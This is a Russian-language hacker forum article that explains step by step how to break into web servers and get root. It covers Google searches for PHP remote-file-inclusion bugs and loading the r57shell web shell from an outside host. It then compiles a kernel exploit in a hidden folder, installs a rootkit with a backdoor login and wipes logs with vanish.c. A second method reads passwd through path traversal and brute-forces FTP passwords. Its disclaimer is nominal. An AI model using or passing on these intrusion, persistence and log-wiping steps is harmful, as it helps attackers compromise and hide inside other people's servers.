1)В этой статье я опишу некоторые способы получения рута на сервере. Сразу хочу оговорится: это не учебное пособие, это мои размышления и они никаким образом не могут использоваться для незаконных целей. Также хочу сказать господам КулХацкерам, что в этой статье они ничего нового не найдут : это основы
Итак, приступим. Что же нужно для взлома? Прежде всего : голова, прямые руки и Интернет. ОК, все это у тебя есть (кроме прямых рук , иначе бы ты не читал это). Получать доступ к серверу мы будем путём юзания веб шелла . Что мы делаем (я не буду тут объяснять ошибки в скриптах и т.д. , если есть вопросы их можно задать на irc.chatnet.ru #wox), открываем в своем браузере поисковик GOOGLE. Теперь мы займемся, как говорят, гуглхакингом. Нам нужно найти странички с багами в PHP, но нам нужен определенный баг, для этого пишем в строке поиска allinurl: index.php?page=http:// жмем кнопочку искать. Гугль выдаст нам некоторое количество ссылок содержащих в своем урле строчку index.php?http://, к сожалению большинство из них не работают , так как дыры уже закрыли. Но все таки можно что нибудь найти: например вы нашли примерно такую страничку содержащую в урле – xaker.net/index.php?page=http://hack.com , теперь нужно проверить работает ли он. Так при открытие страница не выдала никаких ошибок, значит что дела у нас не так уж плохи, дальше нам нужно написать программку на PHP , которая будет выполнять роль шелла (код скрипта я опускаю так как таких очень огромное кол-во в инете) или воспользоваться уже готовым шеллом, сохраняем его в txt и вылаживаем на свою страничку, если таковой нет, можно воспользоваться вполне приличным хостингом – narod.yandex.ru. Регим аккаунт и заливаем туда наш скрипт. Теперь заходим на страничку с багом и в строке браузера добавляем к index.php?page= путь к скрипту , например
http://Mysite.narod.ru/shell.txt. Должен открыться вебшелл с командной строкой. Следующее наше действие – это нужно узнать на какой оси крутится этот веб сервер, это можно сделать командой uname –a, А лучше использовать веб шелл , который можно взять с
http://rst.void.ru/download/r57shell.txt или указать к нему путь из строки браузера (это упрощает наше дело так, как не нужно регить аккаун), юзайте этот шелл , так как он имеет вполне дружественный интерфейс и там все понятно даже чайнику и не нужно знать команды никсовых осей. Кстати ,я, вам сразу скажу что вы практически не найдете серверов с данной уязвимостью если будете писать в строке поиска Google : allinurl: index.php?page=http:// (я нашел меньше десятка), поэтому проявите фантазию пиши вместо index – action , вместо http:// можно написать .htm или news.txt и т.д.
Итак мы добрались до шелла, теперь мы узнали какая стоит ось, сразу скажу, что нам нужен только Linux и ничего другого(почему? Поймете когда столкнетесь с проблемой где взять руткит или сплоит). Например мы нашли сервер с осью Linux 2.4.10. , что дальше, идем на securitylab.ru или еще куда нибудь и ищем сплоит под это ядро. Так сплоит мы нашли. Создаем на сервере папку в которую мы этот сплоит будем заливать и где будем компилить: cd temp – переходим в папку темп, mkdir .exp – создаем папку с точкой (такую папку будет трудно найти не зная ее точного названия), cd .exp – переходим в эту папку, теперь сюда нужно закачать сплоит. Можно воспользоваться командой wget, lynx или др., для закачки из сети . Но мы будим закачивать файл через веб шелл r57shell, в котором есть функция загрузки файлов как из сети так и с твоей машины. ОК, теперь нужно скомпилить его: пишем gcc exploit.c . Очень часто бывает что сплоиты не компилится (это бывает по разным причинам), поэтому либо доводим до ума то, что имее (с вопросами обращаться на #wox), либо ищем рабочий. После успешной компиляции запускаем сплоит командой a.out. Attacking… Идеальный результат будет если ты получишь , что то типа UID=0 GID=0 . Все ты ROOT . Но это еще не все, на похаченную систему надо поставить руткит, ведь не будете же вы каждый раз ломится в систему используя сплоит (что сопоставимо с вышибанием двери кувалдой) . ROOTKIT – это набор программ для удержания включающий в себя бекдоры, логвайперы, снифферы и д.р. хрень. Они заменяют бинарники на свои, например команда ps перестанет показывать процессы определенного пользователя и т.д. Скачать рутки можно с
http://www.packetstorm.security.com/UNIX/p...
Распаковать можно командой tar –zxvf rootkit.tar.gz – это распакует архив, cd /rk5 – перейдем в папку, .make install – установка руткита. Все теперь можно отключаться и спокойно коннектится к сераку через Telnet . Вводим логин rewt, пароль satori. От такого ввода система впустит вас с правами рута. Вы счастливы и сразу начинаете цеплять сканеры, брутофорсы и др. А логии? Про логи вы забыли? Этот руткит не ведет логии ваших действий , но ведь осталось куча логов о незаконном вторжении на сервер. Конечно можно удалить все записи о ваших действия из логов в ручную, но это долго и нам не нужно, так как вы все равно не найдете все логии куда велись записи и не все сможете изменить (если просто все поудалять то можно проститься с рутом , т.к.
Админ тоже не чайник и увидев пустые логи он задумается и скоро вас вычислит). Поэтому скачиваем программулину
Http://www.packetstorm.security.com/...ipers/vanish.c
Запускаем vanish root victim.dom you_ip Удаляет все записи о действиях с вашего ip. Теперь вы хозяин ситемы!
2) Следующий способ основывается на другой уязвимости . Я не буду говорить вам как найти эту уязвимость иначе обламаю вам весь кайф, но расскажу как с помощью нее можно получить рута.
В общем уязвимость показывает нам в браузере файл passwd на сервере. Например mysite.ru/index.php/…./…./…./…./…./…/passwd . Если вы нашли такие уязвимости, то вам не составить сделать юзер лист с списком всех юзеров в passwd. Потом нам нужен фтп брутофорсер, который использует юзер листы. Запускаем брутофорс указываем user.txt куда мы вписали всех юзверей и начинаем атаку, вполне реально что вы найдете слабые пароли!
Итак в конце успешной атаки у нас есть пара логин-пароль одного из юзеров сервера. Конечно можно его задефейсить, но это нам ненужно так как наша цель сервер. Поэтому берем тотже самый Shell.txt , сохраняем его в PHP и заливаем в папку. Теперь в браузере набираем user.mysite.ru/shell.php откроется небезисвестный нам веб шелл, а дальше вы уже знаете что делать.
Источник: DaMaGeLaB
Вход
FAQ
Поиск
